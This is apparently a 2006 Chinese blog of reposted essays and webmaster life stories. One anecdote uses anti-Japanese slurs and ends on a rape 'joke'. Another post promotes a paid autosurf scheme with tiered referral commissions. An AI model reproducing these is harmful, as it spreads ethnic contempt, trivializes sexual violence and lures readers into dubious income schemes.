Cnr 's Inn

杀鸡取卵的代价

2006-12-05T01:43:00.001-08:00

在我们老家，村里有个叫俊子的人很穷，但他很乐于助人，曾经救过我们家族三四个人，小时候，我落水也幸遇他救起。三叔可怜他，想帮他致富，最初送给他一头牛，嘱咐他好好耕地，春天播下种子，秋天就可以脱离贫穷。俊子满怀希望开始奋斗，可是没过几天，牛要吃草，人要吃饭，日子过比过去还难。于是他想，不如把牛卖了买几只羊，先杀一只吃，剩下的可以生小羊，当年羊的行情还不错，长大可以卖更多的钱。俊子的计划如愿以偿，只是吃了一只羊之后，小羊也迟迟没有生下来，日子又艰难了，忍不住又吃了一只，俊子想，这样下去不得了，不如把羊卖了买些鸡吧，鸡生蛋的速度要快一些，日子立刻能够好转吧。俊子的计划如愿以偿，但是日子并没有改变，艰难的时候，他有忍不住杀鸡，终于杀到只剩一只鸡时，俊子的理想彻底崩溃了。心想，致富是无望了，不如把鸡卖了，打壶酒，一醉解千愁。春天来了，三叔还兴致勃勃的送来种子，却发现俊子醉卧在地上，房间里依然一贫如洗。三叔气得转身就走了，俊子继续他的贫穷生活。很多人都有过梦想，甚至有过机遇，有过行动，但最终没能坚持到底。曾听一位商界风云人物说过：没钱时，不管再困难，也不要动用投资和积蓄，压力会使你找到赚钱的新方法。富有富的理由，穷有穷的根源。穷和富，并不在于有没有资源，而是如何对待资源。杀鸡取卵，资源终将枯竭。相反，善于开发，资源将不断升值！

心态决定命运

2006-11-28T17:32:00.001-08:00

为什么有些人就是比其他的人更成功，赚更多的钱，拥有不错的工作，良好的人际关系，健康的身体，整天快快乐乐地过着高品质的人生，似乎他们的生活就是比别人过的好。而许多人忙忙碌碌地劳作却只能维持生计。其实，人与人之间并没有多大的区别。但为什么有许多人能够获得成功，能够克服万难去建功立业，有些人却不行？　　不少心理学专家发现，这个秘密就是人的“心态”。一位哲人说： “你的心态就是你真正的主人。”一位伟人说：“要么你去驾驭生命，要么是生命驾驭你。你的心态决定谁是坐骑，谁是骑师。” 　　大概是40年前，福建某贫穷的乡村里，住了兄弟两人。他们抵受不了穷困的环境，便决定离开家乡，到海外去谋发展。大哥好像幸运些，被奴隶般卖到了富庶的旧金山，弟弟被卖到比中国更穷困的菲律宾。　　40年后，兄弟俩又幸运地聚在一起。今日的他们，已今非昔比了。做哥哥的，当了旧金山的侨领，拥有两间餐馆，两间洗衣店和一间杂货铺，而且子孙满堂，有些承继衣钵，又有些成为杰出的工程师或电脑工程师等科技专业人才。　　弟弟呢？居然成了一位享誉世界的银行家，拥有东南亚相当分量的山林、橡胶园和银行。经过几十年的努力，他们都成功了。但为什么兄弟两人在事业上的成就，却有如此的差别呢？　　兄弟聚头，不免谈谈分别以来的遭遇。哥哥说，我们中国人到白人的社会，既然没有什么特别的才干，唯有用一双手煮饭给白人吃，为他们洗衣服。总之，白人不肯做的工作，我们华人统统顶上了，生活是没有问题的，但事业却不敢奢望了。例如我的子孙，书虽然读得不少，也不敢妄想，唯有安安分分地去担当一些中层的技术性工作来谋生。至于要进入上层的白人社会，相信很难办到。　　看见弟弟这般成功，做哥哥的，不免羡慕弟弟的幸福。弟弟却说，幸运是没有的。初来菲律宾的时候，担任些低贱的工作，但发现当地的人有些是比较愚蠢和懒惰的，于是便顶下他们放弃的事业，慢慢地不断收购和扩张，生意便逐渐做大了。　　以上是真实的故事，反映了海外华人的奋斗历史。它告诉我们：影响我们人生的绝不仅仅是环境，心态控制了个人的行动和思想。同时，心态也决定了自己的视野、事业和成就。　　有两位年届70岁的老太太，一位认为到了这个年纪可算是人生的尽头，于是便开始料理后事；另一位却认为一个人能做什么事不在于年龄的大小，而在于怎么个想法。于是，她在70岁高龄之际开始学习登山，其中几座还是世界上有名的。就在最近还以95岁高龄登上了日本的富士山，打破攀登此山年龄最高的纪录。她就是著名的胡达·克鲁斯老太太。　　70岁开始学习登山，这乃是一大奇迹。但奇迹是人创造出来的。成功人士的首要标志，是他思考问题的方法。一个人如果是个积极思维者，实行积极思维、喜欢接受挑战和应付麻烦事，那他就成功了一半。胡达·克鲁斯老太太的壮举正验证了这一点。　　一个人能否成功，就看他的态度了！成功人士与失败者之间的差别是：成功人士始终用最积极的思考、最乐观的精神和最辉煌的经验支配和控制自己的人生。失败者则刚好相反，他们的人生是受过去的种种失败与疑虑所引导支配的。　　有些人总喜欢说，他们现在的境况是别人造成的。这些人常说他们的想法无法改变。但是，我们的境况不是周围环境造成的。说到底，如何看待人生把握人生由我们自己决定。

老婆让我@@了那个曰本女人……

2006-11-28T02:00:00.000-08:00

周六和老婆去夫子庙逛街，一对曰本的情侣在我们边上走由于我老婆会日语能听懂他们说什么，只见我老婆脸色越来越差，我问她怎么啦，他说小曰本骂中国人太多而且全是废物，还有些不堪入耳的话。我说算了，别理了，过了一回我老婆冲着他们说了一句日语：“你听的懂中文吗？，紧接着那个男的说了一句中文：“是的我听得懂”。我老婆马上说了一句我从没听她说过的话“你们是一对SB！”小曰本马上要冲上来，我把我老婆往身后一挡，那个小曰本看我很壮就停下来问我： “她为什么骂我？”我说：“我老婆比较直爽”他好像没听懂直爽是什么意思，就说了一句“好吧”，带着那个女的走了我老婆紧接着和我说：“老公，你去把那个女的强J了吧，我绝对支持你，而且也不会怪你”.....我立刻无言....

今天注了一个米

2006-11-28T01:52:00.000-08:00

http://kdata.cn

刚才search了下。发现。。。。

http://www.baidu.com/s?wd=kdata&cl=3

http://www.google.cn/search?hl=zh-CN&q=kdata&meta=

汗。。。。

我的网路历程——辛苦并快乐着

2006-11-28T01:50:00.000-08:00

我做网站，从接触到现在，已经一年有余，现在刚到“落伍”来不久，看到很多人站长都把自己的经历写下来和大家分享，看了不少，很多都能引起自己的共鸣，想想，我也应该，也有必要写点东西了……因为我想落伍。关于做网站，各位站长都经历过自己的酸甜苦辣，都过失败的痛苦和成功的喜悦，经历虽然各不相同，但有一点我想是相同的，那就是——辛苦并快乐着！第一次“做”网站，源于一个偶然机会。2005年上半年，我刚刚从武警部队复员，还没有安排工作，在部队呆了几年，退伍后就像脱缰的野马，什么事在部队不能干的，都要干一遍……特别是遇上网络游戏传奇后，就天天沉浸在游戏的打打杀杀里面（这就是我和网络的第一次亲密接触）。有一天，QQ里一个同学发给我一个他的空间，静态的，他在上面放了一些自己的文章、相片之类的东西。当时一看不错啊（其实现在看来不怎么样），我们一个平民百姓也可以拥有自己的网站！就在QQ上问他怎么申请、怎么做等问题，于是按照同学在QQ上所说的方法，一步步按照他的顺序申请，还真申请到了！然后就自己开始“做”网站了——在其他网站看到好的文章就“另存为”到电脑上，然后再“传”到自己的空间上，但是怎么也打不开，再问同学，原来是没把网页名称没为“index.htm”……终于打开了，但内容还是别人的内容，怎么才能把自己的内容发上去呢？从同事那里又得知了有一个叫做“Macromedia Dreamweaver MX 2004”东西可以做网页，而且很直观。通过跟同事花了半个小时临时“充电”，大概弄懂如何把字打Dreamweaver MX 2004的页面并保存下来后，就开始大批量制作属于自己的网页了，并把这些网页都设置了“首页>>正文”的链接，呵呵。把这些网页全部传到空间后，就开始通过QQ大量地给自己的同事、同学、朋友、三姑六婆等等都发了一遍……而且还重复问他们“打开了没有？觉得怎么样？”当得到他们的肯定回答后，当时心里甭提多高兴，那个美哦，觉得自己是多么了不起！现在想起来，那时候自己确实什么都不懂，能够做出一个“网站”来，是一大进步了。自从申请第一个免费空间后，得到了别人的肯定，成就感就被激发出来了，从而一发不可收拾！为了给人新鲜而不同的感觉，于是不停地去做新的网页，然后又发给同事、同学、朋友、三姑六婆……夜以继日。又到网上“百度”一下，网页效果代码找了一大堆，什么新奇花俏都有，都往里放……做出来的网页那是文字漫天飞舞，效果眼花缭乱，觉得那才能显示自己的才能。那时候不知道申请统计代码，但是看到别人的网页显示“你是第*****个到访本站的人”后，直接“复制”别人的过来，但那是图片，数字怎么也不会改变……，又是“百度”一下（百度在我学习做站过程中，真的占有很重要的位置，得感谢百度），这才申请到真正的统计代码，代码放到网站后，一天不知道看多少次，，以至于开着统计，几分钟刷新一次，觉得哪怕是多一个访客，成就感又会多一分…… 但是做了一段时间后，发觉自己的做的和别的不一样，别人的能够注册，我的怎么也不行，一问一些“高手”，说，人家那是asp,有数据库，是动态的。我又想怎么才能让我的网站动起来呢？又“百度”一下，还真有老多东西我没看过的，什么asp、php、什么net之类的……一点也不懂，找一些整站来试验，可是下载下来，还得找动态空间，找了好几个，不好用大一点的不好找，小一点的空间装不下。后来在一些论坛上看到就以用本机装上什么iis5.1就能够在本机测试了……就按照别人说的弄，学会了安装iis了，嘿，还真行！在本机能够调试了。但要别人能访问，始终还得找动态空间。期间，找了不少，5M的，10M的，20M30M的，还有50M的，但是这些空间，说是长期免费，但都是空间商们宣传用的，都用不长久，如果你不买他们的空间，用着用着就把你给关了，这使我再次明白——天下没有真正免费的空间（午餐）！没办法，做网站已经做上瘾了，赶紧买一个空间吧。第一个空间，也是我自己第一个能够叫做“网站”的网站，很便宜，距本月刚好一年。当时看到“西祠胡同”很不错，而且平时还看到有“东祠胡同”和“南祠胡同”，于是花98元RMB买一个100M的动态空间，外加一个CN域名，一百来块钱。弄了了个社区，取名“北祠胡同”！用仿西祠的程序“v6bbs”，把所有应该改的地方都改后，就开始往里贴文章，以为自己就是下一个“西祠”。那时候热情仍然高涨，不分昼夜，除了吃饭兼上厕所，就是在电脑跟前贴贴子。但是结果并没有像我想像的那么好，一连好几个月，访问的人寥寥无几，最多IP一天不过一百，2005年10月份安排工作后，这个网站也就没怎么维护，上面都是别人发的广告贴，这个月，网站空间到期，此站也就无疾而终…… 话说安排工作后，就没有那么多时间搞网站了，也就没时间维护“北祠胡同”，但从来没有停下对网站的“研究”，每天下班后，仍然利用业余时间看与网站相关的东西，也接触了像动易、新云、创力等功能强大的整站程序，知道不少程序都带了“采集”功能，而“采集”功能对于像我这种既想做站，又没时间的人来说，无疑是在黑暗中看到了光明，于是又买空间，做了我的第二个站，用的是动易2005，别人修改过的（后来发觉改得很多错误），大多数文章都是采集而来，也减轻了很多工作量。这其中网站的主题、定位等都改变了很多次，但是流量依然上不去。后来才发现是网站推广问题（自己一直都没有向百度和google提交过申请！）。开始着手推广一个月后，流量有所改观，一天有两百左右IP，多的三百以上。但是这个空间极不稳定，向空间商询问，也没有给过合理满意的答复，过不了多久，居然连空间商的网站也打不开了，也不知道向哪投诉，所以也就当自己吃哑吧亏，这个空间就算是交学费了。没了这个网站，一天到晚不舒服。于是又重新买一个500M的空间，由于吸取了上次的教训，这次挑了一家比较正规的，知名的空间商（不说是哪家了，免除广告嫌疑），做起大家都或许曾经有过的“垃圾站”，主要也是采集（大家共享啊），也非常注重优化推广，现在各大搜索引擎都能搜索得到，一天IP一千多，百度收录四万多，没有作弊ALEXA排名都在几十万，直到现在还在用，而且就在十月份，我从这个站收到了我做站以来的第一笔广告费人民币30元！那天好高兴，终于收到钱了！于是请了几个朋友到外面小撮了一顿，结帐168元！自上个月后，我的广告费就不断增加，点击的，弹窗的，都有，一天下来，三五元是有的。十一月份开始，又往网站里加了GG的广告，开始一天不到一刀，后来我看到一些GG优化的文章后，改变了一下GG广告的位置，立竿见影，收效明显，每天收入不断攀升：USD1.0——USD2.0——USD3.0——USD5.0，这几天还超过了USD10！明天就要达到100美元了。可以明确的是我没有作弊，就是怕在内容方面，虽然不是黄色内容，但也个别内容有点“少儿不宜”，不知道会不会被K。当然，做“垃圾站”不是最终目标，只是想通过做这些站积累一些经验，我还在努力，也在思考下一步的打算，但可以告诉大家的是，短短一年多时间里，我已经从一个不知道网站为何物，只知道在“传奇”世界里打打杀杀的人，成长为一个已经拿到30￥的“站长”！做网站是辛苦的，数月的通宵达旦的工作，日复一日的面“屏”苦思；忍受颈、肩、腕、腰伤痛的折磨、还有右手腕处的厚茧……这一年多来，无论是身体上、精神上还是金钱上，我都吃尽了苦头；做网站是快乐的，快乐在于学习，在于收获，在于每一个网页和每一个IP！我想，我会继续将这个网站做下去的，哪怕吃尽再多的苦头。因为，已经走出了第一步…… 我想，我还会再有更多的故事写出来与大家分享，因为我还在做网站…… 我想，我一定会落伍，因为我还会把我的故事及经验教训写出来与大家分享……

国外经典网赚介绍:rotatorquee(最爽的全自动冲浪公司)——点击看全文

2006-11-25T03:36:00.000-08:00

注册: 点击注册

网赚界公认的最爽的全自动冲浪公司，每天至少可赚2美元! 50美元支付！！！强烈推荐, rotatorqueen的时薪是冲浪赚钱里面最高的，每小时可达$0.15以上,那你自己就挂个10个8个小时吧，不过可别24小时。注册后试了一下，一会功夫就已经达到5美分了.建议不超过20小时,最小化后可以不管了.
.下线提成：3％-2％-1％-1％.

点击上述连接进入后点击网站右侧框格 FREE PROMOTION 转入下页，在左侧填上你的Email地址和密码，然后点击＂Creat my account＂就成功了！然后，网页转到登陆页面，用刚才的Email地址和密码登陆后，你会看到“Autosurf URL”（自动冲浪链接，点击这个链接就可以开始赚钱了！)
当然，和任何冲浪赚钱公司一样，你什么也不用做，打开那个链接就可以了！登陆后要在 Profile（资料）里填写自己的个人资料：
　　 Full name：全名（用拼音）如：王小虎 Xiaohu Wang
　　 Address：地址（用拼音），如何填写地址
　　 City：城市（用拼音，如保定 Baoding）
　　 Zip：邮编
　　 State：省（如：河北 Hebei）
　　 Country：国家（填 China)
　　填完后按save 保存资料。
　　其他的英文意思如下：
　　 Downline :可以查看下线名单
　　 Logout：退出
　　 Overview ：打开后可以看到你的资料。
　　 Account status >帐户状态Active说明是激活的,如果不是Active请按后面的Change
　　 Autosurf URL：就是你的冲浪链接，可以设成主页，每次上网打开它就可以赚钱！
　　 Referal URL：你的下线链接，冲浪时间自己掌握，有宽带的人可开10几小时，但不要24小时转，会被做弊的，等你做到了$50（只要10几天哦！）就可以请求支付了，登陆后选择 Overview，打开后最下面的表格中点击Money Requests，到支付页，在框里输入你的用户ID、e-gold帐号和email地址等信息，再点击submit按钮，就等着收钱吧！
　　 rotatorqueen支持四级下线：3%-2%-1%-1%，用各种宣传方式去建设一个自己的精英团队吧！

注册: 点击注册

从贫苦农村少年，到IT人的跨步

2006-11-25T00:26:00.004-08:00

落伍难，大家都知道。技术不行，文笔不OK，那怎么办？硬着头皮写点自己的经历，希望鱼能给落了。

我是85年生人，文化不高，其实，不应该说不高，应该说很低。职中毕业。毕业五年了，到现在还没有去领毕业证书。我从来不崇尚学习无用。相反，学习才是出路。

没有落伍里大多数人那么好运，可以生在一个好的地方，好的家庭。我比较惨点，生在江苏苏北一个偏远的小村庄。到14岁，才知道什么是城市。才明白城市是什么样子的。才了解，城

市真的和咱们村不一样。

读完初中，因为成绩不好，只好去读了卫校，三年班的，学的是社区医学，学到第二年，广东过来一老板，招人，说是到广州做社区保健，于是，浩浩荡荡的跟着40多个女孩子开过去

了。到了那才知道，做当时广州最火热的足部按摩，呵呵，相信这里的很多兄弟都有做过，我手法不错，有空，按两下。跟着学了两个月。发了800块钱，在广州，800块钱算什么那？

第三个月，由于人缘关系好，死命装傻，一天干10几个小时，被老板看重了，提到了管理层，做了个小主管，干什么的？也没什么事，就是接待下客人，安排下去哪按摩而已。迎来送往

的。一送就是半年。那时，工资+提成，1200一个月。那时，有个最大的梦想，第一，学会广东话，第二，能把自己的工资涨到2500。

2002年的非典，我就在广州，有次罗大右的演唱会，记得很深刻，后来还上了报纸骂，说是担着杀人的罪名来开的演唱会，那时候，我们在广州，封锁消息的，谁都不知道。不提政治。不违反规矩。

生意很惨淡。经营不下去了。老板说要退，问我有没有兴趣跟他，那时的我，没什么本事，又是刚出社会，没办法，我说跟吧，这一跟，就跟到了茂名，广东茂名，很小的城市。不过，

有着广东的特色，酒店多，老板搞了家三星级的酒店，嘉燕，如果有茂名的朋友，应该知道这个酒店，03年8月15日开张的，在没开张前，在里面跟工程，跟了半年。也使我学到了很多

，我们做康乐部，说白点，就是桑拿。广东的朋友知道这里是做什么的。一开始，做个部长，后来提副经理。一步一步上，那时候，经济已经不是什么考虑的问题了，有人以为这叫青

云直上，其实，一天16个小时拿命拼下来的，我们农村人，读不好书，只有跟个好老板。跟人家卖命。04年。我离开了嘉燕，辞职报告打了三个月才批我，现在很难得能找到个这么听

话又卖力的员工。离开以后，自己接了个场所做。当然，是跟另外一个老板，离开的原因很简单，钱和前途。在那个场所，短短两个月，我就把他的客员翻了两倍多。也从我自己在酒店

呆了三年的经验里传授给那个场所很多东西。半年以后，离开了那个场所。去了家四星的酒店，一直干到了05年1月。几年没回家，父母想念，于是，便回家来了趟，南方冬天都不冷的

，结果，几年后的第一个冬天，我感觉到了冷。父母坚决不让我回广东，没办法。只好不回去，丢了我在那边打了几年的基础和关系。内地不像那边酒店好做，不管是服务，素质还是意

识，都跟不上，又不能在家里闲着。唯一选择，继续学习。05年2月，选择去学网络工程，其实， 98年开始，我就认识电脑。只是，那时候家里的人总是说，那个东西是玩物丧志。

在漫长的广东工作时间，我泡在各大论坛内，那时候，还没有落伍，或者说，并不被我所知，真正用上电脑，是01年以后。才能说将就懂点。我的所有WEB知识，全部来自BBS，在BBS

里，我学到了很多，那时候的BBS，没有这样污秽，很干净。很舒服。当然，现在也还好。其实，同样的，我也应该属于第一，或者第二代网民，不过是那种小的连自己都看不见的第一

、二代摆了。不知道什么叫网络。

选择学习网络工程，一开始是以为和WEB或者是WWW有关系，等交了钱，才明白，两个概念。两条路。但是，选择了，就不要后悔。从WORD开始学习，我相信，我的WORD在江苏也

难找对手，因为，我遇到了个好老师，但是，你玩的在好，那也就是个办公自动化，不能说明什么问题。在学习的差不多10个月里（我提前离开的），我考了不少IT认证，MCSE，CCN

A，CCNP，CIW，LIUNX，等等，有什么证能考，我全考，就连OSTA，MLC我都考。凭着在酒店混了几年的经验，很快的，把学院领导全部搞定，当然，这搞定也是和经济挂上点的。

并且抢注了学院的域名，一时连院长都找我聊了几次，打算收回去。最后，8千卖了给他们。还有人情在里面。在学习ING，经常还接点私活，帮人家搞搞站点，出出思想，一个月也能

搞个4000-5000，本来嘛，社会办学，就是比较懒散。怎么做，靠自己的。你问我那些证啊？呵呵，给了题库，背出来的，我还不错，能活学活用，有的可就惨了，学了一年，浪费

4万多，什么都没有。让我铁了心做网络的，还是05年12月份，我一下就接了三个站，连学院的域名，那个月，我赚了2万多，那时候就感觉到，网络，好做！

06年刚过完年。就和一个同学风风光光的在老家注册了个10万的小公司。两个人，一个搞设计，一个搞外联，跑跑单，一个月几千块，乐的自在。因为要用空间，3月的时候，一个搞IDC

的朋友劝我一起搞IDC，那时候，还不知道IDC是什么玩意，结果就一起干了，从此，开始了我的网上贸易。一个月也能卖6000左右。

到了5月，又找了个合伙人，搞了个机房，特小的那种，拉跟100M，就搞服务器托管，生意还不错，小公司，不忽悠，事实在在做生意，本本份份做人。我以为我就这样一个月拿个400

0、5000的就算了，我原来在一起的朋友在6月的时候给我电话，说准备搞网络工程公司，问有兴趣不，我胆大，搞就搞。于是，退掉了那家小公司的股份，到了另外一个市里，搞成招商

引资项目，注册资金300万。搞了家网络工程公司，7月开张，算下来，才不到4个月，做了几单工程，收益也不错。最主要，还是开心。

我对未来，没什么打算。能这样开心的过，我就最满意了，知足长乐！

下次，写关于自己建站的故事。呵呵，这次需要鱼看在我敲了这么多字的份上，给落了吧。真不容易啊！

我是怎么走上站长道路的

2006-11-25T00:26:00.003-08:00

记得是在97年吧，好象是，记性并不是我的强项，当时有一款非常火爆促销机[联想同禧500]在全国发售，在这之前，我对于电脑的了解不比现在对神州六号的内部构造了解多多少。只是因为好象很便宜，很实惠，更多的还是因为老**一个朋友是卖这个的，[我也算是咱这一代比较早的见识“传销”的人了吧。呵呵。]其实，谁也不知道能用来干什么，而我唯一想得到这台电脑的冲动，来自于身边朋友们长期给我灌输的电脑游戏的神奇诱惑。
有了电脑，却丝毫玩不转，亏的身边的几个好兄弟也不知道怎么的都跟电脑高手似的，其实今天看来，他们那些三脚猫的工夫，实在令我这靠IT混饭吃的“专业人士”无念....
终于，在这帮“高手”兄弟们夜以继日，苦口婆心的精心培养下，一年后，我看见了硬盘.......也看见了一年来积攒在电脑里的灰尘....
驱猫上网开始在某一年流行起来了，而我，却坚持不上网！尽管这次兄弟们说破了嘴，我依然坚定信念——自己的电脑还玩不转呢上什么网啊！除了多花钱有啥好处？[其实更多的是因为的担心那破猫耽误我和MM的电话情缘^_^]
就这样，我硬是一直坚持到MM变成了GF，才开始了和猫的第一次亲密接触。而那时候，ISDN都已经快GAME OVER了......
想想应该是2001年或者是2002年吧[我这倒霉的记性几次都使我想把它格式化重装！]，我一个哥们是个象棋迷，每天都要来找我杀上三两盘，在经历了长达半个月的“第一局他没赢第二局我没输第三局他要和棋我不干”的蹉跎岁月后，他终于怒了，强烈要求与我在网上对杀，正值ADSL的浪潮和小区宽带的风暴狂吹，各大运行商都在抢客户的时期，我和他，在联众见面了。
我一直没告诉他，其实象棋是我成年之前唯一拿过奖状的项目，很自然的，历史还在延续.... 终于，
气急败坏的他在联众的广告里发现了一个叫”疯狂坦克“的网络游戏，一个阴谋在他心中从此扎下根了...
摊上这样的兄弟是我一辈子的痛，一向洁身自好的我，在他日益增长的淫威下，终于失身了....我第一次进入到网游中....
两个月后，疯狂坦克二区有了一支百战百胜，所向披靡的战队群——”中华乐团“。旗下还有三大分战队热血中华，锦绣中华，热恋中华。而我，就是传说中的总队长，因为乐团都是以乐器名为ID，而我，就是”中华葫芦丝“。而我现在的网名葫芦或老葫芦，就是那时候队员们对我的爱称[羞]....

历史从这一天起开始发生变化了，我也开始不知不觉中走上了站长这一路。
原自一次队员群聊，不知是谁说了句，老葫芦，咱们该有个自己的论坛，这样交流起来会方便很多。
%$#&*@@$@$?？？？？什么是论坛！！！！晕！
俺是队长啊，怎么能让兄弟们笑掉大牙呢。于是，我随便搪塞了一句变匆匆下线了...
苦学，钻研，学着灌水，拍砖.....几天后，当我终于对BBS这东东了解的差不多时，正赶上一个当时很火的论坛在招疯狂坦克战队联盟，只要是玩这个游戏的有战队就能来申请版块，我就去了....
半个月后，300多战队会员聚齐BBS，我第一次当了版主，其实也就是自己那个版里当个头头。一个月后，我升任该BBS超级版主，三个月后，我成了master....
从老爸那一代开始就是这样，俺家总出老好人系列。也许是占了天平座的光吧，我和论坛里的男男女女，老老少少关系都打的很好。社区里一片天下太平的景象，每天都想唱”今天是个好日子“。

本质上的东西一辈子也改变不了。我生就不是爱玩网游的人，再加上后来疯狂坦克那款游戏被盛大运行的外挂横飞，我们的战队开始走下破路了，我也不怎么上线了。而那个站的站长却是个网游迷，后来他又提升了两位管理员，这是两个我很不赞成的管理员，一到社区就有一种杀一儆百的感觉，一时间社区里人心惶惶，而他作为站长却总是出来调解来调解去，做些表面活.....我知道，一个如此有前途的社区快到了关门的时候了。

”葫芦，咱拉出来自己干吧“。社区上的朋友开始三三两两的给我传递这样的信息，而我那时候，已经开始狂热的迷恋上BBS这个东东了。
说到这里时，我依旧是个网络二把刀，什么都知道点，但什么都不会弄。
从来没有像那一次一样，我如此敬佩自己！这一次，我对时间记得很清楚，2003年9月18日，我在社区发出了要另立门户的帖子....赶的很巧，我也很背，那天居然是9·18事变纪念日，一时间，这个论坛又火了。有骂我是叛徒的，也有积极响应要跟我走的....顾不了那么多了，我的人品从不需要别人指指点点，那时候一句很俗的话却经常在我耳边想起：走自己的路让别人说去吧。我只知道我只有20天时间，我只知道我在帖子上一时激动说出了要在10月5号我生日那天开坛，我只知道那时候我还啥也不会！不懂什么是玉米，不懂什么是ASP，不懂什么是静态空间，更不知道还有个那么容易架设的DVBBS！！！！！
不怕各位笑话，我那时候真的是每天只睡两个小时觉，一门心思的钻研BBS，终于到了我生日那天，我的论坛开张了。其实用的还是别人的整站程序，也是动网的核心，而白痴的我这么多天来更多的是在走一个又一个弯路，做一个又一个无用功！不，不能这么说，在今天看来，那时候的工夫绝对没有白费，至少我明白了一件事：世上无难事，只怕有心人！

论坛开张了，人气也是好的出乎意料。老社区近半数的人都过来了。看着每天一两千的帖子，心里美的很。那时候的我可不知道啥叫流量，只是觉得这多热闹啊......
在网络上，我第一次感受到责任心也许就是从这时候开始的，大家都知道，不管你做论坛还是做网页，总避不开图片吧。什么LOGO，BANNER等，没图片怎么成。一开始，这东西我都是请我原来一个战队的朋友给做的，我那时候井底之蛙的眼光，使我把他当成了神，结果他居然拿AMD官方标志糊弄我了近一年时间....

有一次我和他同时跟一个社区的女管理员聊天谈闲事，三个人为一点小事开玩笑闹着玩，他突然在MSN上说了这样一句话”：XXX[指那个女管理员]你可想好啊，帮我还是帮葫芦？他可不会帮你做签名图啊。哈哈...”说着也许无心，可我不能无意！这句话深深刺痛了我！那一刻，我决定了一件事。
倔强的我拖关系找熟人，在管理严格的军校里终于弄了个走读的身份，可以自由进出学校不住校了。于是，我立即在一个很有名的电脑学校报了名。利用大学自习多的机会，开始漫漫三个月的求学生涯。
每天奔波在城市的南北两边，我毫无怨言，三个月后，我拿到了网页三剑客Macromedia官方认证和Macromedia认证的网页设计师证书。5天后，我的站拥有了自己的LOGO。

我开始疯狂迷恋BBS美工，开始疯狂迷恋上做网页，在长达两年的时间里，我不顾一切的修改论坛，做皮肤，到官方发风格，做一堆毫无任何意义的网页.....眼看着论坛的人气一点点消退，眼看着过去的朋友一个个离开，我丝毫视而不见....

时间转到了2005年的第一个春天，我想我还是成熟点了。今年3月份，我毅然辞掉了在一家网络公司担任技术部经理的职务，开始做我自己的网站，第一个有意义的网站。
现实就是这样，不是你每次付出多少就能回报多少的。第一次，我失败了。一味追求娱乐休闲，却根本不知道在这方面自己一点都没天分而霸王硬上弓，结果很自然，空间商都激动得拿我那网站美工当成功案例去显摆了，而我的站还是每天百十个IP.....

人生就是这样，要经历风雨，也要享受阳光，放开一切包袱的我，终于在1个月前找到了我的最爱，找到了自己需要的是什么，倔强的脾气让我一下子清空了所有网站数据，新网站感动中国诞生了。我不再奢望流量和盈利，我不再盲目追求美观和个性，我知道我得把网站实实在在的做起来！我会坚持我的决定，我会努力为它奋斗.....

给所有和我一样的站长的话：
如果您真的看完了我这篇文章，别再去追求表面的东西了，别在为了盈利而做些东西了。如果你真的喜欢这一行，如果你真的爱网站，你该把他当成你的朋友，而不是赚钱的工具....

做好一个论坛的几个步骤

2006-11-25T00:26:00.001-08:00

写得不好，大家多体谅着点，只是写了一些自己的小经验，多批评多批评

做好一个论坛

我觉得做网站是以“物质”为基础，而论坛在的“物质”基础上，更多的要包含着“情感”。

一、论坛版块规划

论坛的建设，在初期最好有几个同爱好的朋友，根据大家的意愿开版块，各管一个版块。但不在版块多，经常见到许多版块，能一个版块说明的东东，偏偏分了三，虽然版块名字不一样，但其实内容是差不多的，有些会员在发帖时会想，我这帖该发到哪个版呢？我的帖如果发到这个版会不会有人看呢？

论坛要做的有特色，尽量不与别人相同，让会员感觉去谁家玩都一样那就没戏了。

论坛不要限制太多，什么必须注册啊，必须登陆啊，这些最好别设置，别为了几个会员名额，丢了后面的搜索引擎。

二、论坛发展起步

论坛初期发展是最难的，做好了没几个人知道，只自己一个人或和几个朋友在上面逛，从下面的在线图标里看到的除了管理员就是总版主或是版主，很郁闷。

在发展初期，我觉得最好是有个网站的支持，找个做网站的朋友做下页面小广告，如果没有，那就要靠白手起家了，天天泡在帖吧，发帖和大家一起交流，多认识朋友，这样朋友联系朋友，渐渐论坛会稍有人气。

递交到各搜索引擎，还要根据一些上升快的关键词，在论坛发一些和关键词有关系的帖子，最重要的还是做自己的，有时间就多丰富和论坛主题相关的帖子，这是给大家看的，也是给引擎蜘蛛吃的，帖子是越多越好，保持住每天更新，别一天发N多，第二天没词了，停了。

建立几个QQ群，便于大家互相联系交流，这样也是拉住一部分会员。

三、论坛发展中

发展一段时间，应该有一定的会员在线量了，这时不管是有什么活动起码有人参加了，这时就是要多搞活动，多进行积分啊奖章啊VIP啊奖励，进一步固定会员。

制作电子书，利用业余时间做些论坛帖子的整理电子书，最好全用的论坛程序页面，这样在帖子里可以保留住会员的头像啊，信息啊等等的，感觉这本书就像是相片，让大家没事的时候看书时也是一种怀念。做的时候别都做成会员帖了，因为不只是给论坛会员看的，更是为了提交到各下载站，如果是电脑类网站就多做电脑资料的电子书，这样通过下载，会有更多的人找到我们的论坛。

建议管理员多和版主们交流，管理员和版主们多和会员交流，大家一起交流，成了一锅里的饺子就热闹了。在论坛管理员可以严肃，但版主再整天横着脸就太好了，会员是来玩的，不是来接受你们管理的。

对于一些技术版块，选一个好版主不容易，这个只有热情是不够的，到时给会员提供全是错误的答复，那你就坐着小板凳哭吧。

版主是一个论坛中的灵魂，关键时候比管理员还有用，管理员不要太自我了。

等论坛稳定发展了，就要积极和各个网址站靠拢，hao123是首选。我的站曾经在hao123上，带来的流量还是不错，最近把俺给咔嚓了...后面我会说明是怎么回事。

四、发展中的一些小问题

首先要说的是更换论坛程序或是更换空间，一些论坛做到了一定时候，根据发展需要，要换程序，这里要做好，程序这方面不太用说，多是有转换程序，数据什么的都不会丢。不过要小心，什么事都可能发生，我论坛www.luotuo.net做了三年，每年都换程序，不是我愿意，是有些逼的，要不是程序漏洞，月月有，所以从ASP换CGI的，当时朋友的空间是CGI的，他就是用的，所以我换了，转换时数据出错，没办法，全换新的，重新从0开始，朋友空间到期，自己买的空间，用了不到三个月，突然停了，登陆空间管理后才发现一条信息说，空间商要求论坛本地备案，真太阳，不早通知，昨天发的信息，今天就停了，要通知也有电话啊邮箱啊，发空间管理里谁没事登陆上来看啊。跟空间商联系也没消息，数据又没了，这下又忙着找空间，测试空间，停了一星期多，反正数据没了，就又重新换了PHP的，顺便给论坛起了一个新名字，再看流量时，发现没有hao123来源了，去一看，原来hao123上没有了，郁闷，呵呵。

更换论坛程序和空间，最好是找能个人指定404、400等等错误页面的空间，这样不至于页面无效而流失会员和从引擎找来的朋友。这点一定要记住啊，要不以前的工作可能是浪费一大部分。

五、收尾

